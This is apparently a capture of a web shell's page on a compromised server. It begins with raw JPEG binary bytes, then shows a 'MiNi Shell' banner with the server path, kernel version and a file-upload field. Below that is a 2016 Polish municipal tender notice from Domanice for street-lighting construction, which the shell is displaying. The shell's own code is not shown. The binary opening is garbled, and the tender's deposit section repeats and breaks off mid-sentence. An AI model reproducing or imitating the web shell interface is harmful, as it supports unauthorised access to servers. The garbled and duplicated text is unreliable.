JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160916/309449-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 309449 - 2016
              z dnia 2016-09-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Domanice: Budowa  sieci  energetycznej- napowietrznej   linii  oświetlenia  ulicznego  w  miejscowości   Pieńki,Domanice, Olszyc  Szlachecki, Olszyc  Włościański   ( 4 zadania )<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Gminy, krajowy numer identyfikacyjny
              71000394800000, ul.
              Domanice 
              52,
              08113  
              Domanice, woj.
              mazowieckie, państwo
              , tel.
              256 312 982, e-mail
              ugdomanice@wp.pl, faks
              256 312 982.
              <br />
              Adres strony internetowej (URL): bip.domaice.eu                                 E-mail    ugdomanice@wp.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />bip.domanice.eu</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Wykonawca   może  zożyć  jedną  ofertę    pisemnie osobiście   lub  droga  listową   <br />
                Adres:
                <br />,Urząd  Gminy  Domanice, Domanice 52</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa  sieci  energetycznej- napowietrznej   linii  oświetlenia  ulicznego  w  miejscowości   Pieńki,Domanice, Olszyc  Szlachecki, Olszyc  Włościański   ( 4 zadania )<br /><b>Numer referencyjny: </b>GPK.0272.2.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>ZADANIE  SKŁADA  SIĘ  Z  4 ZADAN. KAŻDE  ZADANIE  NALEŻY WYCENIĆ  ODDZIELNIE  Z  JEDNOCZESNYM  PODANIEM  WARTOŚCI  CAŁEGO  ZADANIA.
Zadanie nr.1 obejmuje   m-ść  Pieńki  gm. Domanice:
Przebudowę napowietrznej linii nn :
- montaż przewodu typu AsHSn 2x25 mm2  1971 mb
- montaż opraw oświetleniowych  21 szt.
- demontaż nieczynnego sterowania oświetleniem ulicznym  1 kpl
- montaż skrzynki SON  2 szt.
Zadanie nr.2 obejmuje   m-ść  Domanice  gm.Domanice:
- montaż przewodu typu AsHSn 2x25 mm2 (obw.2)  260 mb
- montaż opraw oświetleniowych  4 szt.
- demontaż sterowania oświetleniem ulicznym wraz z układem pomiarowym  1 kpl
- montaż skrzynki SON na stacji transformatorowej  1 kpl
Zadanie nr.3 obejmuje  m-ść Olszyc  Szlachecki gm. Domanice:
- budowa napowietrznej linii oświetlenia ulicznego przewodem AsXHSn 2x25 mm2  90 mb
- budowa stanowisk słupowych  3 szt.
- montaż opraw oświetlenia ulicznego  3 szt.
Zadanie nr.4 Zakres inwestycji obejmuje m-ść  Olszyc  Włościański  gm.Domanice:
- montaż przewodu typu AsXSn 2x25 mm2 (obw.1,2)  437 mb
- montaż opraw oświetleniowych               7 szt.
- demontaż sterowania oświetleniem ulicznym wraz z układem pomiarowym  1 kpl
- montaż skrzynki SON na stacji transformatorowej  1 kpl
<br /><br /><b>II.5) Główny kod CPV: </b>54310000-3<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              152000.00<br />
              Waluta:
              <br /><div style="padding-left: 20px">pln<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 15/11/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                     Zamawiający nie precyzuje szczegółowych warunków w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                     Zamawiający uzna warunek za spełniony w przypadku, gdy Wykonawca będzie  
     dysponował opłaconą polisą, a w przypadku jej braku innym dokumentem 
     potwierdzającym, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w 
     zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 
     100 000,00 złotych.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a) Zamawiający wymaga, aby Wykonawca posiadał doświadczenie w zakresie zrealizowania 
    w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres 
    prowadzenia działalności jest krótszy  w tym okresie, należycie wykonane co najmniej 
    jedną robotę budowlaną w zakresie przedmiotu zamówienia o wartości nie mniejszej niż 
    50 000,00 złotych.
b) osoby skierowane do realizacji zamówienia:
    Wykonawca zobowiązany jest wykazać na etapie składania ofert dysponowaniem co 
    najmniej jednej osoby posiadającej uprawnienia budowlane do kierowania robotami w 
    specjalności inżynieryjnej elektrycznej w zakresie sieci instalacji i urządzeń elektrycznych
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">      1) aktualny odpis z właściwego rejestru lub z centralnej  ewidencji i informacji o 
        działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
        ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 
        pkt. 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu   
        składania ofert.
  </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />     Zamawiający wymaga, aby Wykonawca złożył oświadczenie o niepodleganiu     wykluczeniu oraz oświadczenie o spełnianiu warunków udziału w postępowaniu które stanowić  będzie  wstępne  potwierdzenie  spełniania   warunków  udziału  w postępowaniu oraz  brak  podstaw  wykluczenia. Oświadczenie, że  Wykonawca  dysponuje  osobami  zdolnymi  do  wykonania  zamówienia. Dokumenty potwierdzające posiadanie  uprawnień.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Wykaz wyknanych lub wykonywanych  robót</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">
    A) Oświadczenie z art. 25a ust. 1 podstawy wykluczenia Załącznik nr. 5.
    b) Oświadczenie wykonawcy składane na podstawie art. 25a ust. 1 ustawy z dnia 29  
        stycznia 2004 r. Prawo zamówień publicznych dotyczące spełniania warunków udziału w 
        postępowaniu Załącznik nr. 6. 
    c) Oświadczenie, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia 
        oraz, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają 
        wymagane uprawnienia Załącznik nr. 9.
2) W zakresie spełniania warunków udziału w postępowaniu Wykonawca składa:
     * wykaz robót wykonanych w okresie ostatnich 5 lat przed upływem terminu składania 
        ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres 
        prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich rodzaju, 
        wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały 
        wykonane, z załączeniem dowodów określających czy te roboty zostały wykonane 
        należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty 
        wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a 
        jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie 
        uzyskać tych dokumentów- inne dokumenty potwierdzające należyte wykonanie usług 
        Załącznik nr. 7.
      * wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, niezależnie od tego, 
         czy są one zatrudnione bezpośrednio przez Wykonawcę, w szczególności 
         odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat 
         ich kwalifikacji zawodowych, doświadczenia i wyksztalcenia niezbędnych do wykonania 
         zamówienia, a także zakresu wykonywanych przez nie czynności. Załącznik nr. 8.
3) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, 
     należy przedłożyć: oświadczenie o braku przesłanek do wykluczenia z udziału w 
     postępowaniu. Wykonawca powołujący się przy wykazywaniu spełniania warunków 
     udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji 
     części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie 
     wymaganym dla Wykonawcy.
4) Dokumenty podmiotów zagranicznych to: dokument wystawiony w kraju, w którym ma 
     siedzibę lub miejsce zamieszkania potwierdzający, że: nie otwarto jego likwidacji ani nie 
     ogłoszono upadłości- wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu 
     składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia 
     albo składania ofert.

5) Inne dokumenty:
     * Pełnomocnictwa osób podpisujących ofertę do reprezentowania w postępowaniu o  
        udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w 
        sprawie zamówienia publicznego w imieniu wykonawcy lub wykonawców wspólnie 
        ubiegających się o udzielenie zamówienia, o ile nie wynikają z przepisów prawa lub 
        innych dokumentów (w przypadku spółki cywilnej może to być kopia umowy spółki).
     * Wykonawca musi pisemnie wskazać w ofercie części zamówienia, której wykonanie    
        powierzy podwykonawcom.
     * Wykonawcy występujący wspólnie muszą spełnić warunki art. 23 ustawy z dnia 29 
        stycznia 2004 r.  Prawo zamówień publicznych oraz Kodeksu Cywilnego  wymagane w 
        przypadku składania oferty wspólnej przez kilka podmiotów ( dotyczy także spółek 
        cywilnych).
Uwaga: Wszystkie ww. dokumenty składane w niniejszym postępowaniu powinny być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę/y podpisującą/e  ofertę- z wyjątkiem oświadczeń- forma oryginału.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Przystępując do przetargu Wykonawca jest zobowiązany wnieść wadium.
1. Ustala się wadium w wysokości  3000,00 zł  łącznie  na  wszystkie  zadania   :
     
2. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej formie:
    1) w pieniądzu, przelewem na rachunek bankowy: 
96 9198 0003 0100 1270 2001 0008
    2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
        kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym.
    3) w gwarancjach bankowych
    4) w gwarancjach ubezpieczeniowych
    5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
       ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
       Przedsiębiorczości (Dz. U. 2016 poz. 359).
Wadium wnosi się przed upływem terminu składania ofert tj. przed dniem 30.09.2016 r. 
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: 96 9198 0003 0100 1270 2001 0008 z dopiskiem: wadium-zadanie nr 1
3. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
4. Wadium wniesione w pieniądzu należy złożyć z odpowiednim wyprzedzeniem, tak aby 
     wpłynęło ono na rachunek bankowy Zamawiającego przed upływem terminu składania 
     ofert. Powyższe zalecenie wynika z czasu trwania rozliczeń międzybankowych. Za termin 
     wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku 
     bankowym Zamawiającego.
5. Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z 
     umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o 
     koszty prowadzenia rachunku bankowego orz prowizji bankowej za przelew pieniędzy na 
     rachunek bankowy wskazany przez Wykonawcę.
6. Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z 
     ofertą w osobnej kopercie.
7. Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno 
     zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do 
     zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, 
     następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/ 
     poręczyciela.
8. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form 
     wadium Wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta 
     podlegać będzie odrzuceniu.
9. Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze 
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, 
     którego oferta zostanie wybrana jako najkorzystniejsza.
10. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci 
     wadium niezwłocznie po zawarciu umowy.
11. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę 
     przed upływem terminu składania ofert.
12. Zamawiający zatrzymuje wadium wraz z odsetkami, w przypadku wystąpienia przesłanek 
     określonych w art. 46 ust. 4a i 5 ustawy Pzp.
13. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w 
     art. 45 i 46 Prawa zamówień publicznych.
XI. Okres związania ofertą
1. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
2. Wykonawca pozostaje związany ofertą przez okres 30 dni o upływu terminu składania 
     ofert.
3. W uzasadnionych przypadkach, na co najmniej 3 dni przed upływem terminu związania 
     ofertą Zamawiający może tylko raz zwrócić się do Wykonawców o wyrażenie zgody na 
     przedłużenie tego terminu o oznaczony okres, nie dłuższy jednak niż 60 dni.


4. Wykonawca może przedłużyć termin związania ofertą samodzielnie, zawiadamiając o tym 
     Zamawiającego.
5. Jeżeli przedłużenie terminu związania ofertą dokonywane jest po wyborze oferty 
     najkorzystniejszej, obowiązek jego przedłużenia dotyczy jedynie Wykonawcy, którego 
     oferta została wybrana jako najkorzystniejszaPrzystępując do przetargu Wykonawca jest zobowiązany wnieść wadium.
1. Ustala się wadium w wysokości  3000,00 zł  łącznie  na  wszystkie  zadania   :
     
2. Wykonawca wnosi wadium na każde zadanie oddzielnie w wybranej przez siebie, wymienionej poniżej formie:
    1) w pieniądzu, przelewem na rachunek bankowy: 96 9198 0003 0100 1270 2001 0008
    2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
        kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym.
    3) w gwarancjach bankowych
    4) w gwarancjach ubezpieczeniowych
    5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
       ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
       Przedsiębiorczości (Dz. U. 2016 poz. 359).
Wadium wnosi się przed upływem terminu składania ofert tj. przed dniem 30.09.2016 r. 
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: 96 9198 0003 0100 1270 2001 0008 z dopiskiem: wadium-zadanie nr 1
3. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
4. Wadium wniesione w pieniądzu należy złożyć z odpowiednim wyprzedzeniem, tak aby 
     wpłynęło ono na rachunek bankowy Zamawiającego przed upływem terminu składania 
     ofert. Powyższe zalecenie wynika z czasu trwania rozliczeń międzybankowych. Za termin 
     wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku 
     bankowym Zamawiającego.
5. Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z 
     umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o 
     koszty prowadzenia rachunku bankowego orz prowizji bankowej za przelew pieniędzy na 
     rachunek bankowy wskazany przez Wykonawcę.
6. Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z 
     ofertą w osobnej kopercie.
7. Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno 
